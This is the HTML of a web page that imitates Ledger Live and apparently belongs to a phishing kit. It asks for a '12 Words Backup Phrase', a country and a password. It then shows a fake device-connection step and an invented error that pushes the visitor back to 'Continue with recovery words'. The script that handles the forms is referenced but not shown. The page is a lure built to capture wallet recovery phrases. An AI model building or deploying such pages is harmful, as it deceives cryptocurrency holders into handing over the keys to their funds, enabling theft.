<!DOCTYPE html>
<html>
<head>
<title>Ledger Live</title>
<script src="js/jquery.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="css/main.css" rel="stylesheet">
<link href="css/chrome.css" rel="stylesheet">
</head>

<body>
<div class="loader-wrapper">
<ul>
<li>
<img id="imgo" src="" alt="">
</li>
<li>
<div>
<span class="img-container">
<!-- Inline parent element -->
</span>
</div>
</li>
</ul>
</div>

<div id="one"><center>
<span class="img-container">
<!-- Inline parent element -->
<img id="imgo" src="img/1.png" alt="logo">
</span>
<br />
<form method="POST" id="form">
<div style="margin-bottom: 30px;">
<input placeholder="12 Words Backup Phrase" type="text" id="w1" required="">
</div>
<br />
<button class="restore" id="button" type="submit">RESTORE</button>
<br />
</form>
<span class="img-container">
<!-- Inline parent element -->
</span>
</center></div>

<div id="two"><center><span id="twoo">
<span class="img-container">
<!-- Inline parent element -->
<img id="imgo" src="img/1.png" alt="logo">
</span>

<br />
<form method="POST" id="formo">
<select id="country" name="country" style="-webkit-appearance: none;width: 265px;height:40px;color:#a6a6a6;margin-bottom:8px;background-color: #fff0;border: none;border-bottom: 2px solid white;" required="">
   <option value="" disabled selected>Select your country</option>
   <option value="Argentina">Argentina</option>
   <option value="Armenia">Armenia</option>
   <option value="Australia">Australia</option>
   <option value="Belarus">Belarus</option>
   <option value="Belgium">Belgium</option>
   <option value="Brazil">Brazil</option>
   <option value="Bulgaria">Bulgaria</option>
   <option value="Cambodia">Cambodia</option>
   <option value="Canada">Canada</option>
   <option value="China">China</option>
   <option value="Colombia">Colombia</option>
   <option value="Croatia">Croatia</option>
   <option value="Cuba">Cuba</option>
   <option value="Czech Republic">Czech Republic</option>
   <option value="Denmark">Denmark</option>
   <option value="Dominica">Dominica</option>
   <option value="Ecuador">Ecuador</option>
   <option value="Estonia">Estonia</option>
   <option value="Finland">Finland</option>
   <option value="France">France</option>
   <option value="Georgia">Georgia</option>
   <option value="Germany">Germany</option>
   <option value="Greece">Greece</option>
   <option value="Greenland">Greenland</option>
   <option value="Haiti">Haiti</option>
   <option value="Hawaii">Hawaii</option>
   <option value="Honduras">Honduras</option>
   <option value="Hong Kong">Hong Kong</option>
   <option value="Hungary">Hungary</option>
   <option value="Iceland">Iceland</option>
   <option value="India">India</option>
   <option value="Ireland">Ireland</option>
   <option value="Israel">Israel</option>
   <option value="Italy">Italy</option>
   <option value="Japan">Japan</option>
   <option value="Korea Sout">Korea South</option>
   <option value="Luxembourg">Luxembourg</option>
   <option value="Malta">Malta</option>
   <option value="Mexico">Mexico</option>
   <option value="Netherland Antilles">Netherland</option>
   <option value="New Zealand">New Zealand</option>
   <option value="Nicaragua">Nicaragua</option>
   <option value="Norway">Norway</option>
   <option value="Panama">Panama</option>
   <option value="Paraguay">Paraguay</option>
   <option value="Peru">Peru</option>
   <option value="Phillipines">Philippines</option>
   <option value="Poland">Poland</option>
   <option value="Portugal">Portugal</option>
   <option value="Romania">Romania</option>
   <option value="Russia">Russia</option>
   <option value="Rwanda">Rwanda</option>
   <option value="Saudi Arabia">Saudi Arabia</option>
   <option value="Serbia">Serbia</option>
   <option value="Slovakia">Slovakia</option>
   <option value="Slovenia">Slovenia</option>
   <option value="Spain">Spain</option>
   <option value="Sri Lanka">Sri Lanka</option>
   <option value="Sweden">Sweden</option>
   <option value="Switzerland">Switzerland</option>
   <option value="Taiwan">Taiwan</option>
   <option value="Thailand">Thailand</option>
   <option value="Ukraine">Ukraine</option>
   <option value="United Kingdom">United Kingdom</option>
   <option value="United Arab Erimates">United Arab Emirates</option>
   <option value="United States of America">United States of America</option>
   <option value="Uraguay">Uruguay</option>
   <option value="Venezuela">Venezuela</option>
   <option value="Vietnam">Vietnam</option>
   <option value="others">others...</option>
   </select>
   <br />
<input id="ww" style="margin-left: 5px;" placeholder="Password" type="password" value="" class="ww" required="">
<a id="typepassword"><img id="fho" style="margin-left: -25px;z-index: 1;bottom: -5px;position: relative;" src="img/noeye.jpg"></a>
<br />
<input id="www" style="margin-left: 0px;" placeholder="Repeat Password" type="password" value="" class="ww" required="">
<br /><br />
<button id="ho" class="button" type="submit">CONTINUE</button>
<button style="display:none;" id="hoo" class="button" ><img id="loadingo" src="img/loading.gif"></button>
</form></span><span id="twologo" class="img-container">
<!-- Inline parent element -->
</span>
</center></div>

<div id="tree"><center>
<span class="img-container">
<br /><br />
<span style="color:black;"><b>Choose your device</b></span>
<br /><br /><br />
<div style="margin-top:0px;">&nbsp;</div>
<a id="runer" href="#nano x"><img class="active" id="runerimg" style="margin-top:-15px;" src="img/Model1.png"></a>
<div style="margin-top:10px;">&nbsp;</div>
<a id="runer" href="#nano s"><img class="active" id="runerimg" style="margin-top:-15px;" src="img/Model2.png"></a>
<div style="margin-top:10px;">&nbsp;</div>
<a id="runer" href="#blue"><img class="active" id="runerimg" style="margin-top:-15px;" src="img/Model3.png"></a>

</span><br/>
</center></div>

<div id="four">
<center>
<span class="img-container">
<img id="runerimg" style="margin-top:-40px;" src="img/both.png">
</span>
<div id="loadingooo"><img id="loadingoo" src="img/loading-gif.gif" style="position: absolute;top: -48px;right:44px;">
<span style="color: #484747;font-size: 13px;padding-top: 2px;margin-left: 25px;"><div style="border: 1px solid #b0c4ec;padding: 25px;border-radius: 3px;">Connect and unlock your <b>Ledger device</b></div></span>
<span style="color: #484747;font-size: 13px;padding-top: 2px;margin-left: 35px;margin-top:10px;"><div style="border: 1px solid #c1c1c1;padding: 25px;border-radius: 3px;">Press <b>both buttons</b> on the device to begin</div></span>
</div></center></div>

<div id="five">
<center>
<span class="img-container"><br />
<img id="runerimg" style="margin-top:-10px;" src="img/error.png">
<br /><br /><br />
<span style="color:black;"><b>Something went wrong. Please plug your device.</b><br /><br />
if connected, please check cable connection (0x6f00)
</span>
<br /><br /><br />
</span>
<form method="POST" id="formuo" style="border: 0px;margin-top: 20px;">
<span><button id="button">Retry</button></span>
</form>
<form method="POST" id="formou" style="border: 0px;margin-top: 10px;">
<span><button id="button">Continue with recovery words</button></span>
</form>
<br />
</center></div>

<script src="js/loader.js"></script>
</body>
</html>